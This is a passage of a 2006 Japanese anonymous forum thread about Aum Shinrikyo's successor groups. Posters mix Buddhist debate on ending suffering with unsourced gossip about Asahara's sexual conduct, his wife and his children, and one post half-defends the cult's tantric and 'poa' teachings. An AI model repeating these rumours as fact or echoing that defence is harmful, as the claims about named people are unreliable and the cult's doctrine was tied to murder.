529 :名無しさん@3周年:2006/08/26(土) 08:10:52 ID:DLlUBmID
上祐さんはまだ若いね。

530 :和井 恵:2006/08/26(土) 08:24:34 ID:KUSX34OL
>>474
>私の言う絶対の真理は
>この世界から未知の事象を完全になくした上で
>あるべきであると思っています。

私の考えは、貴方とはかなり違います。
というのは、私が目的としていたのは
「全知全能」になることなどではなく、
「苦の滅尽」を得ることだったからです。

「一切知」という言葉がありますが、
私は最初、この意味を「全ての事を知る智慧」という風に
捉えて(考えて)いました。
しかし、「一切経」というアーガマを読んだとき、
その考えを変えたのです。

531 :和井 恵:2006/08/26(土) 08:25:40 ID:KUSX34OL
友よ、わたしは「一切」について話そうと思う。
「一切」とは、いったい何であろうか?
それは、眼と眼に見えるもの、耳と耳に聞こえるもの、
鼻と鼻ににおうもの、舌と舌に味わわれるもの、
身体と身体に接触されるもの、心と心の作用、のことである。
これが「一切」と呼ばれるものなのである。

誰かがこの「一切」を否定し、これとは別の「一切」を説こう、
と主張するとき、それは結局、言葉だけに終わらざるを得ない。
さらに彼を問い詰めると、その主張を説明できず、
病に倒れてしまうかも知れない。 何故であろうか?
何故なら、彼の主張が彼の知識領域を越えているからである。
(サンユッタニカーヤ 33.1.3)

釈迦は別に、「全ての事象を知り尽くす」ことを目的に
修行をしていた訳ではありませんでした。
つまり、釈迦が獲得した「苦が滅尽された状態」とは、
そのような状態(全知全能)になったときに、
起きたのではない、ということです。

532 :名無しさん@3周年:2006/08/26(土) 08:58:43 ID:NJSg582P
>>520
早い話が信者のゼニで旅行してるってことでしょ
A派だって経行ツアーと称して山行ったりしてるんだから。ま、A派の
は近場の日帰りだけどね。
宗教にゼニがかかるという事実はオウム時代から何も変わっていない(w



533 :名無しさん@3周年:2006/08/26(土) 09:04:07 ID:NJSg582P
「盲信」という表現に上祐さんのふっきれた感じが伝わってきたよ。
たぶんM派は普通の宗教団体レベルになるだろうな。
真如炎とか、テンリとか・・
ま、宗教を組織化している限り、そこに真理はないのだけどね(w


534 :名無しさん@3周年:2006/08/26(土) 09:08:44 ID:NJSg582P
M派が教義に麻原の著作をまだ使っているなら笑っちゃうけどね。
だんだん、そういうものから離れていくかもしれんな。
この先、神道とか日本仏教を混ぜて創作していくような気がするな。
そう、宗教団体の教義なんぞはその気になれば誰でも作れるんだから(w


535 :名無しさん@3周年:2006/08/26(土) 09:24:27 ID:Enz5n1ru
>>531
なるほど、和井さんと私は最終的に得ようとしているものも
異なっていると言えますね。





536 :名無しさん@3周年:2006/08/26(土) 09:37:54 ID:DLlUBmID
>>531
「心と心の作用」というのは?
原文を見てないから断定はできないけれど、
これはおそらく誤訳で、
「心と心に(直接)感じられるもの」というのが、
正しい訳だろう。
仏陀釈迦牟尼は五感を越えた感覚を否定していなかった。

「彼の知識領域」の一切は、
彼のステージによって異なってくる。
「一切の領域」と「苦の滅尽」とは直接的には関係がない。
しかし、苦の滅尽に至るためには、
かなり広い領域を認識する必要があると思います。
(私は>>474ではありません)


537 :和井 恵:2006/08/26(土) 11:02:33 ID:KUSX34OL
>「心と心の作用」というのは?
>原文を見てないから断定はできないけれど、
>これはおそらく誤訳で、

「意」と「意識」。
(目と目識、耳と耳識、鼻と鼻識、舌と舌識、身と身識)

>仏陀釈迦牟尼は五感を越えた感覚を否定していなかった。

否定してはいませんが、「苦の滅尽」のための
「必要条件」だとは考えていなかったと思います。

>しかし、苦の滅尽に至るためには、
>かなり広い領域を認識する必要があると思います。

いいえ、私は逆に「絞り込み」こそが必要なのだと考えています。

538 :和井 恵:2006/08/26(土) 11:14:54 ID:KUSX34OL
>しかし、苦の滅尽に至るためには、
>かなり広い領域を認識する必要があると思います。

「認識の領域を広げる」のではなくて、
「認識を誤らせるような要素」を排除してゆく。
これが、「苦の滅尽に至る方法」なのだと私は考えています。

539 :名無しさん@3周年:2006/08/26(土) 11:33:25 ID:WOrIP4N/
>しかし、苦の滅尽に至るためには、
>かなり広い領域を認識する必要があると思います。

膨大な数のパターンと無限のバリエーションがあるのでその「根」、コアみたいなものを捉えて
それを落としていくことが必要だと・・・
俺も和井さんと同じように思います。

540 :名無しさん@3周年:2006/08/26(土) 11:38:20 ID:DLlUBmID
>>538
絞り込みとは?
五感だけの感覚で、
老いの苦しみ、死の苦しみを滅尽することができるだろうか?
苦の滅尽は単なる「あきらめ」とは違うと思います。

541 :名無しさん@3周年:2006/08/26(土) 12:05:53 ID:sIrfT88a ?2BP(0)
和井さんの意見に賛成です。
特に、和井さんが目的とされる「苦の滅尽」を目的とするなら。
別に、「火星に火星人がいるか、いないか」を知ったところで、
「苦の滅尽」に関係があるとは思えませんし、
「宇宙のどこかにバルタン星人はいるのか」ということがわかったところで、
実際地球にバルタン星人が襲ってくるのでもない限り、
我々の苦楽とは何の関わりもないのですから。

542 :名無しさん@3周年:2006/08/26(土) 12:19:17 ID:Enz5n1ru
つまり和井さんにとって真理、もしくは絶対の真理とは
自己の苦の滅尽と定義しているわけですか?

543 :名無しさん@3周年:2006/08/26(土) 12:23:17 ID:DLlUBmID
>>541
確かに雑学的な知識は不要だと思います。
あなたはどのようにして「苦の滅尽」を実現しようとしていますか?

544 :和井 恵:2006/08/26(土) 12:51:36 ID:KUSX34OL
>>540
>絞り込みとは?
>五感だけの感覚で、
>老いの苦しみ、死の苦しみを滅尽することができるだろうか?

「意」という六つ目の「感」も含めますけど、
私はそれだけあれば「充分」だと考えています。

>苦の滅尽は単なる「あきらめ」とは違うと思います。

もちろん違うと思います。
苦の滅尽に至る道は、
「現実世界をありのままに観る」この一言に尽きるのです。




545 :和井 恵:2006/08/26(土) 12:57:37 ID:KUSX34OL
>つまり和井さんにとって真理、もしくは絶対の真理とは
>自己の苦の滅尽と定義しているわけですか?

いいえ、「苦の滅尽」へと導いてくれる「認識(見解)」ですかね、
あえて言うならば…
(ただ、私は「絶対の真理」などという大げさな表現は、あまり好きではありません)



546 :和井 恵:2006/08/26(土) 13:01:17 ID:KUSX34OL
>あなたはどのようにして「苦の滅尽」を実現しようとしていますか?

私たちが、心の中に持っている「認識を歪めてしまうモノ」を
全て取り除くことが(一時的にでも)出来たとき、
「自動的に」苦の滅尽は生じます。
いや、「本来の姿に戻る」と言った方が正しいのかも知れませんね…

547 :名無しさん@3周年:2006/08/26(土) 13:04:01 ID:0KvZOcG0
和井 恵ってひと何してる人?
毎日ここにいるみたいだけどニートなの?暇人なんだね。きゃんでぃと同じニオイがする。

548 :名無しさん@3周年:2006/08/26(土) 13:05:43 ID:DLlUBmID
>>544
いくら現実世界をありのままに見たとしても、
愛する人が死ぬ苦しみ、
自分が死んで愛する人と会えなくなる苦しみ、
年老いて、少しずつ醜くなっていく苦しみ、
これは苦しみ以外の何ものでもない。
やせ我慢して、あきらめることはできますが…。

549 :名無しさん@3周年:2006/08/26(土) 13:08:19 ID:Enz5n1ru
「苦の滅尽」へと導いてくれる「認識(見解)」の
一つとして教祖の言っていることも間違いとは言えないですね。
全てへの愛着、執着を取り払う。これができるだけで何の苦も無い
でしょうがそれでは生きているとは言えない気もします。
好きなものを何一つ無くし、苦を滅するというのは死と同じとも
とれますね。
病になろうが難聴になろうが親が死のうがそれに愛着しなければ
何も苦にはなりません。
でもこれは基地外のようで良い見解とは言いたくないな・・・。



550 :和井 恵:2006/08/26(土) 13:20:08 ID:KUSX34OL
>いくら現実世界をありのままに見たとしても、

おそらく「ありのままに観る」という意味を勘違いしているのだと思います。


551 :名無しさん@3周年:2006/08/26(土) 13:21:40 ID:htaER/HP
>>547
他人を批判する前に自己の見解を語れ。

552 :和井 恵:2006/08/26(土) 13:23:36 ID:KUSX34OL
>和井 恵ってひと何してる人?

普段は普通に「仕事」わしています。

>毎日ここにいるみたいだけどニートなの?

毎月20万円くらいの給料を貰っていますから、
ニートではないですね。

>暇人なんだね。きゃんでぃと同じニオイがする。

今日は、「お休み」なのです。
「同じニオイがする」とは、
とても優れた「嗅覚」をお持ちなのでしょうね…




553 :和井 恵:2006/08/26(土) 13:25:40 ID:KUSX34OL
>普段は普通に「仕事」わ

普段は普通に「仕事」を  の間違い。
Enterキーが、うまく押されていなかったみたい…

554 :名無しさん@3周年:2006/08/26(土) 13:29:14 ID:ZhwpNlJg
夫婦円満の秘訣は何といってもコミュニケーションだと思います。会話があって、
そしてスキンシップ・コミュニケーションとして幸せなセックスがあれば、
いつまでも新婚のようにラブラブでいられるはず。

セックスレスとは、「結婚後、同居しているにもかかわらず、身体疾患や特別な
事情がないのに“1カ月以上”セックスがない状態」のことをいいます。まず、
夫と妻、どちらが拒否をしているのか? というところから話は始まります。
どちらからともなく…という場合もあります。


セックスレス、何が原因?
そして、セックスレスの原因…は?「面倒くさい」「仕事や育児で疲れている」
「他に楽しいことがある」「浮気相手がいる」「出産後なんとなく」「
男女というより家族になって」「住宅事情」「相性が悪い」「
いつでもできると思ったらしなくなってしまった」etc…。

「どちらからともなく」セックスレスになってしまった夫婦は、
本当はどちらかがそのことを不満に思っているのに、「今更口に出せない」、「
それについては禁句状態」というケースが多いようです。そんなカップルは、
そのまま放っておいてはいけません。時間が経てば経つほど、溝は深くなってしま
います。

「話し合おう」、なんて言わず、夫婦なのですから、一緒にベッドに入ればいいの
です。そこで、すんなりおよばなければ、この時点で率直に話し合う。なぜなのか
?理由がはっきりしたら、改善すべくどんな工夫と努力が要るのか見えてくるはずで
から…。

現世の人はおもしろい 教祖は恋愛は3年しか持たない
もしそれより長く続くとしたら、相当努力して思い込みあっていると
言っていたな、、、
教祖自身の経験から来るんじゃないのかね


555 :和井 恵:2006/08/26(土) 13:32:15 ID:KUSX34OL
>>549
うん。確かに「全てへの愛着、執着を取り払う。」という方法は、
それを「為し続けることが出来るならば」苦しみを取り除けることが出来るかも。
ただ、これを一生続けると言うことは、これ自体が「一種の苦行」みたいな気が…

556 :名無しさん@3周年:2006/08/26(土) 13:32:51 ID:Enz5n1ru
この世に明らかにできないもしくはされていない原理、
法則を知ったところで必ず苦の滅尽に関係してくとはいえない。
だが仮にカルマや功徳の法則が証明されたと仮定すると
証明不可能なものを無記とするのはある意味盲目に陥る要因になるともとれる。
いずれ証明できるようになる(かもしれない)ものを無記とするのは
いずれ見解を訂正しなくてはならなくなる。



557 :名無しさん@3周年:2006/08/26(土) 13:37:05 ID:sEiv1edU
>>554
中年になって腹がでてきた奥さんに性欲がわくだろうか?
老年になって皺だらけになった奥さんに性欲がわくだろうか?

558 :名無しさん@3周年:2006/08/26(土) 13:47:09 ID:ZhwpNlJg
教祖を奥さんは、バットで殴った、って噂があるが
本当なら、アサハラより怖い女、と世間からは認識されるのであろうな

身長に差があるので、素手では勝てないと思った、って
言い訳が付いていたけど

559 :名無しさん@3周年:2006/08/26(土) 14:01:26 ID:sIrfT88a ?2BP(0)
>>543
「苦を滅尽しよう」と思わないことでしょうか。
私の場合は、ですけど。

560 :名無しさん@3周年:2006/08/26(土) 14:02:21 ID:ZhwpNlJg
>だが仮にカルマや功徳の法則が証明されたと仮定すると
証明不可能なものを無記とするのはある意味盲目に陥る要因になるともとれる。
いずれ証明できるようになる(かもしれない)ものを無記とするのは
いずれ見解を訂正しなくてはならなくなる。

条件が変わればね、、しかし、証明できたらと思いながら、化学文明で証明できない
分野だから、今のところ
それに、仏教の開祖であられる釈迦にすら、そうやって噛み付くところが
この教団の嫌なところだ、、
教祖の説を取り上げると、釈迦を否定することになるだろ?
だかん、純然たる仏教学者とかは、あれは仏教じゃないっていうんよ
いつか、カルマや徳の理論は、化学的に証明されるときがくるかもしれないが
釈迦の時代は今よりずっと、科学的ではなかったからね
これから先も、そんな時代がくるかわからない
くるかもしれないという仮定でモノを話すより、それを外して
わかる範囲で話したほうが、賢明なんだよ
と、漏れは思うね
非難や疑問を受けて、時間を食うのを避けられるから

561 :和井 恵:2006/08/26(土) 14:09:02 ID:KUSX34OL
>>556
>いずれ証明できるようになる(かもしれない)ものを無記とするのは
>いずれ見解を訂正しなくてはならなくなる。

仮定は、どのような仮定も可能な「if(例えば仮にの話)」の話。
その前提で、話しを始めているくせに、それを途中で忘れてしまい、
最後に「しなくてはならなくなる」と断定してしまうのは、
ちょっと「思考の錯乱」なのでは?
「仮定」は、それが「正しい」と証明されてから
初めて「断定」するのが正しいのですよ。

また、「カルマや功徳の法則」について言うならば、
それが「人生をより良く生きる」のには役立つかも知れませんが、
「苦の滅尽」に対しては、直接的な「効力」は無いと私は考えています。

562 :名無しさん@3周年:2006/08/26(土) 14:10:18 ID:ZhwpNlJg
ただ、この教団にいると、霊的にはなる
それがこの教団の売りでもあるが、最大の欠点でもある
証明もできない輪廻をベースにして、殺人をしたのだから
今生死んでも、まだいくらでも再生するという考えで、、

しかも、教祖の下で、弟子入りして修行に励めば、霊的な世界も体現しやすいかも
しれないが、教祖の下でだけしか、というのが、まずいのだ
あれは、アサハラに洗脳されたに違いない、とすぐ思われる
もっと、普遍に、体現できないとね、、

563 :和井 恵:2006/08/26(土) 14:14:31 ID:KUSX34OL
>「苦を滅尽しよう」と思わないことでしょうか。
>私の場合は、ですけど。

それって、「逆転の発想」なのかしら…

564 :名無しさん@3周年:2006/08/26(土) 14:20:54 ID:ZhwpNlJg
和井さん、阿呆陀羅尼みたいになってきたね
以前ここでさんざん説教食らわされましたけど、、
論証好きの人ってのはいるし、そういうほうが論理に矛盾はないんだよね
それが、現代人には、摩訶不思議なこといっているよりは
受けるんだと思うけど、、

オウムは、自分自身が霊的になるのは結構なんだけど
それが、他人に伝わらず自分だけの納得の場合、最悪精神病院行きだからさ
教祖も自分で言っていたんだけどね
、、まあ、時間があればね もっと他のこともできたかもしれない

でもさ、こういう神秘的なことの場合、証明ができないにも関わらず
熱狂的な支持をする人ってのは、いつも必ず一定数はいるものなのね、、
だから、やっていられるのね
それも、DNAに組み込まれているのね きっと

565 :和井 恵:2006/08/26(土) 14:22:08 ID:KUSX34OL
>>554
>夫婦円満の秘訣は何といってもコミュニケーションだと思います。

相手との「コミュニケーション」を上手く取れるかどうか、
そこに「相性の良さ」というものが関わってくると思います。
相手の気持ちや自分の気持ちが、
「歪められずに(誤解されずに)」ストレートに伝わる。
これが無いと、何となく「ギクシャクした関係」になってしまう…
誤解が誤解を生み、悪循環のループに陥ってしまう。

この「相性の良さ」は、素質的に最初からある場合と、
色々な努力を重ねて培っていく場合とがあると思うけど、
スタート地点で「ある程度の相性の良さ」が無いと、
けっこう難しいのかも知れませんね。
私たちの多くは、「見た目」や「性欲」に惑わされて、
そのような「判断」が出来ていないのではないでしょうか?

だから、後から「しまった、こんなはずではなかったのに」
と後悔するようになってしまう…

566 :和井 恵:2006/08/26(土) 15:03:28 ID:KUSX34OL
>おそらく「ありのままに観る」という意味を勘違いしているのだと思います。

私たちの心は、様々な「観念」「囚われ」「思い込み」「執着」「欲情」に支配されています。
その状態で「ありのままに観る」ことは不可能なのです。

567 :名無しさん@3周年:2006/08/26(土) 15:20:41 ID:SHwvWFbl
>>511

スパイウェアで調べなくても、
文体でだいたいキャンディちゃんだと分かるよ。



568 :和井 恵:2006/08/26(土) 15:24:37 ID:KUSX34OL
教祖は「全てへの愛着、執着を取り払う=苦しみの滅尽」と説きました。
つまり、「愛着・執着から離れる」ことを「目的(到達点)」としたのです。
ですから、「その状態」に留まり続けなければならない。

しかし私は、それらは「目的」そのもの、なのではなく、
「(目的に到達するための一時的な)手段(方法)」なのだと考えています。
つまり、「筏(いかだ)」のように、河を渡るまでの間だけ必要とされるモノ。

そこが、彼と私との「認識の違い」なのだと思います。

569 :名無しさん@3周年:2006/08/26(土) 16:02:28 ID:0HatCiFY
教祖ってさ、ある時点で、徳がある人は異性が複数いてもおかしくないって
語った時期があったの
すごい無理やり
そんで、、それを信者の前で言っているときは、以前と違うこといいだしたなあ、と
なんで、そんなことエンエンしゃべらなくても、と
(裏でケイマと寝たのを知らないこっちとしては、変な説法だと思う以外ないわけ)

だって、悟ろうとするものは、異性を心に描いてすらいけないのに
なんでわざわざ、徳があったら、妻が複数いてもいいとかいいだす必要があるんだと
弟子は、心に異性を思い描いてもいけないと、オウムの修行を認識していたのよ
なのにあれ、と

今になって、やりたいことは他人とぶつかってでも、やらないと気がすまないのねと
釈迦は人とぶつかることを避けた傾向にあるけど
(そこらへん非常に慎重であったらしい)
教祖って、ケンカになるの平気、教団内外でそういう振る舞い
いうこと聞かない相手にはケンカ売る
最悪ぶっ殺す


570 :名無しさん@3周年:2006/08/26(土) 16:11:59 ID:0HatCiFY
一事が万事といいますからね
ご丁寧に説明しておられましたよ 徳がない人は一人も妻がいない場合もあるが
もてる人は、日本には一婦一夫があろうとも、たくさんの異性に持てる、、
あ、そうと。
そうじゃなくて、修行の完成を目指す人は、自らの意思で、ひとりも妻を持たないのでしょう

事件後、ダキニがいるのがわかってから、あーそんで、あのとき言い訳シイシイしてたのねと
たしかね、教祖の周りには美人ばかり、という話があるが
私は徳があるのだから、美人が集まって当然と、、まあ、ここらはああそうと。
しかしね、事件後、ケイマにも(私の聞いたところでは)サクラーにも手を出し
と。
んで、あるとき、神妙な調子で、(私は在家だ)と。(しかし、キミたちは(サマナニ向かって)違う
出家だと。キミたちのような出家の戒を守っている者を、非難する者たちには
災いがあるであろう、)と。
なんか、出家空間でエッチして、ちと卑屈になったのか、私は在家と
エッチしたって在家って言えば良いしね、ソンシ。で、出家のことは素晴らしいと
持ち上げておいて、とりあえず丸く治める。

571 :名無しさん@3周年:2006/08/26(土) 16:16:09 ID:0HatCiFY
事件前に、教祖にダキニ(明確にエッチ付きの)がいると
知っていたのは、何人くらいいるのだろうか?

漏れは全くの在家なんで、こんなことが説法に上ること自体、妙だと
思っていたんだけど
あとから、言い訳してたのね、って
その説法をビデオに撮ったり(本にも載ったかな)した編集者は
どんな気持ちであったんだろう

572 :名無しさん@3周年:2006/08/26(土) 16:26:53 ID:0KvZOcG0
\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   バーカ   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)



573 :名無しさん@3周年:2006/08/26(土) 16:28:12 ID:0KvZOcG0
\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   バーカ   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)



574 :名無しさん@3周年:2006/08/26(土) 16:36:19 ID:sEiv1edU
>>568
>教祖は「全てへの愛着、執着を取り払う=苦しみの滅尽」と説きました。
これは仏陀釈迦牟尼もそう説いているのでは?

それが目的であっても、手段であっても、
そう簡単に、その心の状態には到達できない。
結局、戒律を守り、
ムドラーを中心とする修行をガンガンやるしかないのかもしれない。

それで瞬間的に、そういう心の状態に到達したとしても、
しばらく修行せずにいると、
すぐ元通りになってしまう。
そういうものなのだろうか?



575 :名無しさん@3周年:2006/08/26(土) 16:37:54 ID:sIrfT88a ?2BP(0)
>>563
私の場合、滅尽するぞ!と考え始めると、
色々な「武器」を所持し始めますから。
いつの間にか「武器」に囚われが生じることも多いので。
それなら風狂行者みたいに、武器なく生きてみようかと。

576 :名無しさん@3周年:2006/08/26(土) 16:47:41 ID:SHwvWFbl
>>572,573



\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   アホー   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)



577 :名無しさん@3周年:2006/08/26(土) 16:51:22 ID:uBXgVlew
>>570
大乗のヨーガを成就した段階で複数の異性がOK。
マハームドラー(ジュニアーナヨーガ)を成就した段階で、
一人の異性がOK。
尊師の子供を生んだサマナは、
いちおう正悟師以上だから、
いちおう筋は通している。

左道タントラ系の説法を聞いていたとき、
何のために説法するのか疑問だったが、
後から納得した。
ポアの説法も同じ。

578 :名無しさん@3周年:2006/08/26(土) 16:53:19 ID:zrMw3cvm
>>575
ある想念を持つと、それに対する肯定・否定の観念が「ぐわあッ」と
沸いてきますよね。

わいけいさんは想念自体を持たないわけ?

ではどうやって煩悩を鎮めるのでしょうか?
自然におさまるのでしょうか? それならこんな事態にもともとならなかったわけですね?

579 :名無しさん@3周年:2006/08/26(土) 16:55:27 ID:zrMw3cvm
>いちおう筋は通している。

どこの世界の筋なんでしょうか?

オウムだけで通じるものでしょうか?

他にもソースがあったら提示して下さいませんでしょうか?

580 :オウムつぶしたあとは...:2006/08/26(土) 16:57:47 ID:LqpD7LrY
オウムをつぶし、
オウムという抵抗勢力、目の前のたんこぶがとれて
売国自民党はやりたいほうだい、大暴れ!!

こんどは、庶民を戦争に、どんどん投入するのが、
次の作戦。



581 :名無しさん@3周年:2006/08/26(土) 16:58:58 ID:0HatCiFY
>大乗のヨーガを成就した段階で複数の異性がOK。
マハームドラー(ジュニアーナヨーガ)を成就した段階で、
一人の異性がOK。

それって、オウム以外のどこで、通る理論でしょうか
釈迦は悟った後、女性に手を出したりはしなかったようですけど
だから、教祖は釈迦の煩悩に対する思索、煩悩の滅却に対する思索を
素晴らしいと一時期言ったけども、
(ヨガより優れていると評価、よりずっと微細に考察すると)
釈迦を引っ込めてチベット仏教ひといろになったのは
エッチしたいし殺したいから


582 :和井 恵:2006/08/26(土) 17:00:20 ID:KUSX34OL
>>574
>これは仏陀釈迦牟尼もそう説いているのでは?

だから、釈迦はアーガマの中で「筏の例え」を述べた後で、
それらの「法」は、目的(対岸)へ到達するまでの「道具」なのだから、
「渡ったしまえば必要が無くなる」と説明をしている。

「法もまた、捨て去るべきモノである」と。

583 :和井 恵:2006/08/26(土) 17:05:04 ID:KUSX34OL
>それが目的であっても、手段であっても、
>そう簡単に、その心の状態には到達できない。

簡単に到達できればいいんだけどね。
その「時代(条件・環境)」に最も「適した方法」というものが、
あるのではないか、と思っています。
簡単ではないにせよ「最速(最短)の道」は、あるはずなので…

584 :オウムつぶしたあとは...:2006/08/26(土) 17:10:47 ID:LqpD7LrY
    三晋晋晋晋晋晋晋,
   晋晋晋晋晋晋晋晋晋晋三,
   晋晋三 '晋晋晋晋晋晋晋晋i
  晋晋晋   ' ̄ ̄三晋晋晋晋'      国民のみなさ〜ん!
  晋晋晋          三晋晋
  晋晋 I   ◆  ‖ ◆   三晋     オウムつぶしたあとは戦争ですから〜
  I晋   ◆ /)  (\◆   晋
  丶,I ◆/● I  I ●\◆ i'i    いまのうちに、体を鍛えて、
   I │  // │ │ \_ゝ │ I
   ヽ I    /│  │ヽ    I/
    │   ノ (___) ヽ  │     うでたてふせでもしておいてください!!
    │    I  ‖  I    │
     I    |_人_I    I
     i    | --- |   │
     \  /      ヽ ,/
       ヽ____ 'ノ




585 :名無しさん@3周年:2006/08/26(土) 17:10:47 ID:0HatCiFY
\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <  教祖のバーカ   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)


586 :和井 恵:2006/08/26(土) 17:10:58 ID:KUSX34OL
>それで瞬間的に、そういう心の状態に到達したとしても、
>しばらく修行せずにいると、すぐ元通りになってしまう。
>そういうものなのだろうか?

その「心の状態」の、さらに「その先にあるモノ」を見つけることが出来るかどうか。
…というか、本当に「その状態」を経験していたのなら、戻ることはありません。

「私は、為すべき事を為した。二度と再び迷妄の悪循環に陥ることはない。」
という認識が生じるはずです。


587 :和井 恵:2006/08/26(土) 17:13:09 ID:KUSX34OL
>私の場合、滅尽するぞ!と考え始めると、
>色々な「武器」を所持し始めますから。

その武器というのは、具体的にはどのようなモノなのでしょうか?


588 :和井 恵:2006/08/26(土) 17:29:49 ID:KUSX34OL
>わいけいさんは想念自体を持たないわけ?

いいえ、持っていますよ。

>ではどうやって煩悩を鎮めるのでしょうか?

「鎮める」というよりも「気づく」ことが大切だと思います。

「後催眠現象」というものをご存じでしょうか?
深い催眠状態(ファイヤー・ウォールが外されたままで、深層意識が顕れている状態)で、
ある「暗示(指示)」を与えると、私たちは「その本当の理由を知らないまま」
指示された通りの「行為」をしてしまう。

「解っちゃいるけど、止められない」というのは、
その「解っている」というのは、後付けの、自分の行動を納得させるための理屈で、
「本当の原因(動機)」では無いからです。

まず、私たちは「自己の心の奥に蠢く心の働き」を、知る必要があるのです。

>自然におさまるのでしょうか?

それは、無いでしょうね。 

589 :名無しさん@3周年:2006/08/26(土) 17:31:44 ID:0HatCiFY
>大乗のヨーガを成就した段階で複数の異性がOK

そう思ってボコボコ作った子供らは、きっと暗い人生を送るんだろうよ
まあ、天下取るつもりで、さっさと子供作ったのかもね
天下取れば、何しようと俺様の天国だもの

590 :名無しさん@3周年:2006/08/26(土) 17:34:10 ID:0HatCiFY
教祖の子供って、名前を変えることが許されないのかしらね
ギョッコウ、とか超目立ちすぎ 本名なんでしょ


591 :名無しさん@3周年:2006/08/26(土) 17:35:27 ID:0HatCiFY
松本ギョッコウ、って名前かね 変な名前

592 :阿左谷北:2006/08/26(土) 17:36:05 ID:Ccwy1cRI
女優名、思い出しました。
古都ひかるw

パッケージの写真は、そんなに好みじゃなかったけど
ビデオ見ると好みだった。
やはり、外面(パッケージ)で判断してはいけませんね(笑)

593 :和井 恵:2006/08/26(土) 17:38:59 ID:KUSX34OL
>自然におさまるのでしょうか?

ただ、「本当の理由(原因)」が解れば、その時点で、
それらの「強迫観念(自己の行動を特定の方向へ向かわせようとする圧力)」は、
日の光に照らされた雪の固まりのように、簡単に消滅します。

594 :和井 恵:2006/08/26(土) 17:41:04 ID:KUSX34OL
>古都ひかるw

なかなか、センスがいいね。
私も、彼女の作品は好きですよ^^

595 :名無しさん@3周年:2006/08/26(土) 17:43:03 ID:0HatCiFY
  食虫植物   って、殺生のカルマどうなるの?


596 :阿左谷北:2006/08/26(土) 17:46:15 ID:Ccwy1cRI
>>594
和井さんに薦められたんですよ^^
もう、半年以上前ですが。

597 :名無しさん@3周年:2006/08/26(土) 17:48:55 ID:0HatCiFY
食虫植物に食われたら、食われた奴のカルマは落ちて
落ちたカルマは誰が吸収するのだ

598 :和井 恵:2006/08/26(土) 17:52:16 ID:KUSX34OL
>食虫植物   って、殺生のカルマどうなるの?

オウム以外の、例えは「チベット仏教」などでは、
「生きていくために必要な最小限度の行為」は、
「許容範囲」である、と説明されていたと思います。


599 :和井 恵:2006/08/26(土) 17:53:54 ID:KUSX34OL
>和井さんに薦められたんですよ^^
>もう、半年以上前ですが。

そっか…
忘れてたwww


600 :名無しさん@3周年:2006/08/26(土) 17:54:45 ID:VliKhPvY
>>595
植物は妖精が管理しているはずだから、
管理している妖精が引き受けるのでしょう。
食虫植物を管理している妖精は、
ルックスが悪いだろうな。
私は妖精とか見たことがない。
霊視が苦手だからね。
私はステージが低い。


601 :和井 恵:2006/08/26(土) 17:55:54 ID:KUSX34OL
>落ちたカルマは誰が吸収するのだ

オウムの理論では、「食虫植物」と言うことになるでしょうね。

602 :阿左谷北:2006/08/26(土) 17:57:20 ID:Ccwy1cRI
人間でも、狩猟民族は、自然に対する畏怖の念がありますね。
生き物を殺すのは生きていく為だけで
逆に生き物を神様のように崇めていたりする。
例:アイヌ民族

603 :和井 恵:2006/08/26(土) 17:59:05 ID:KUSX34OL
>植物は妖精が管理しているはずだから、
>管理している妖精が引き受けるのでしょう。

ああ、そっか。
植物自体は「真我」を持っていなかったんだっけ?
しかし、そうすると、「食虫植物」というのは、
管理している「妖精」の、心の顕れなのかしら?

604 :和井 恵:2006/08/26(土) 18:01:19 ID:KUSX34OL
>生き物を殺すのは生きていく為だけで
